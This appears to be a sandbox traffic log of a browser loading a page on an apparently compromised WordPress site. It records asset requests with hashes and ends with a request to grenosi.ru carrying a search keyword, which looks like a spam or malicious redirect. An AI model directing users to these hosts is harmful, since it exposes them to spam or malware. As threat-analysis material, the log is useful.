Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://academicounsel.com/homim/zekifohe.html

                                         
132.148.50.1
HTTP/1.1 200 OK
Content-Type: image/png
Date: Thu, 31 May 2018 16:17:54 GMT
Server: Apache
Last-Modified: Fri, 26 Sep 2014 18:46:42 GMT
Etag: "934-503fc5688c880"
Accept-Ranges: bytes
Content-Length: 2356
Cache-Control: max-age=5184000
Expires: Mon, 30 Jul 2018 16:17:54 GMT
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive


--- Additional Info ---
Magic:  PNG image, 34 x 76, 8-bit/color RGBA, non-interlaced
Size:   2356
Md5:    39c8f3283869aefa40d2912a2769b0bf
Sha1:   844da4a385c0302acc8c2c71e5cf55f23316df3f
Sha256: 1aa5713993429387f325c0d7bcd40f446a4c167fc922fc3a9d05587c20102b96
                                        
GET /wp-content/themes/theme48340/images/icon4.png HTTP/1.1
Host: academicounsel.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://academicounsel.com/homim/zekifohe.html

                                         
132.148.50.1
HTTP/1.1 200 OK
Content-Type: image/png
Date: Thu, 31 May 2018 16:17:54 GMT
Server: Apache
Last-Modified: Fri, 26 Sep 2014 18:46:42 GMT
Etag: "9a1-503fc5688c880"
Accept-Ranges: bytes
Content-Length: 2465
Cache-Control: max-age=5184000
Expires: Mon, 30 Jul 2018 16:17:54 GMT
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive


--- Additional Info ---
Magic:  PNG image, 35 x 76, 8-bit/color RGBA, non-interlaced
Size:   2465
Md5:    9a0c97c677f3d39dde2a5f5440225619
Sha1:   3e82adddbbd86b09a213e3ec854c97b447ee02f1
Sha256: 8343f7507e30c1d6f995a1787f9ed57aafedb9e19fffd6e2278a23efb298003b
                                        
GET /wp-content/themes/theme48340/favicon.ico HTTP/1.1
Host: academicounsel.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

                                         
132.148.50.1
HTTP/1.1 200 OK
Content-Type: image/x-icon
Date: Thu, 31 May 2018 16:17:54 GMT
Server: Apache
Last-Modified: Fri, 26 Sep 2014 18:46:38 GMT
Etag: "37e-503fc564bbf80"
Accept-Ranges: bytes
Content-Length: 894
Cache-Control: max-age=2592000
Expires: Sat, 30 Jun 2018 16:17:54 GMT
Keep-Alive: timeout=5, max=91
Connection: Keep-Alive


--- Additional Info ---
Magic:  MS Windows icon resource - 1 icon
Size:   894
Md5:    754f6bcccbeae19997d3fff2c0bc6e17
Sha1:   ef0215855b117a6046f9412cda5f4872aafc898d
Sha256: 63879df0f25d73845662d6d173e1cf19667aaa0be2a4438b104231a10d93833d
                                        
GET /wp-content/themes/CherryFramework/css/style.css HTTP/1.1
Host: academicounsel.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://academicounsel.com/wp-content/themes/CherryFramework/style.css

                                         
132.148.50.1
HTTP/1.1 200 OK
Content-Type: text/css
Date: Thu, 31 May 2018 16:17:54 GMT
Server: Apache
Last-Modified: Sun, 28 Sep 2014 07:32:34 GMT
Etag: "fd4e-5041b27540880-gzip"
Accept-Ranges: bytes
Cache-Control: max-age=86400
Expires: Fri, 01 Jun 2018 16:17:54 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 11890
Keep-Alive: timeout=5, max=92
Connection: Keep-Alive


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   11890
Md5:    fa363e396ba16e7d615dd8a2ed5900d9
Sha1:   e42b58d1367cbe52a38533ed4c368cd449fff6b9
Sha256: 109eb7c2ab6d7837a3683eb8faacba6a052157bd2d5e4c64b5e419fab4f2cc9c
                                        
GET /wp-content/uploads/2011/09/testi-2_small.jpg HTTP/1.1
Host: academicounsel.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://academicounsel.com/homim/zekifohe.html

                                         
132.148.50.1
HTTP/1.1 200 OK
Content-Type: image/jpeg
Date: Thu, 31 May 2018 16:17:54 GMT
Server: Apache
Last-Modified: Fri, 26 Sep 2014 18:46:38 GMT
Etag: "42e1-503fc564bbf80"
Accept-Ranges: bytes
Content-Length: 17121
Cache-Control: max-age=5184000
Expires: Mon, 30 Jul 2018 16:17:54 GMT
Keep-Alive: timeout=5, max=92
Connection: Keep-Alive


--- Additional Info ---
Magic:  JPEG image data, EXIF standard
Size:   17121
Md5:    cb31ecbae0272e9899c20944c00a70a4
Sha1:   c435f0c209ce65adaa83d20c6344d672bcfaef4e
Sha256: 8812926a1c47eac99fb43e433577b17d7e244f5be496a05a1d38b5c68cffbf6e
                                        
GET /3d33?charset=utf-8&keyword=honeysuckle%20hill%20pumpkin%20patch HTTP/1.1
Host: grenosi.ru
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://academicounsel.com/homim/zekifohe.html

                                         
0.0.0.0


--- Additional Info ---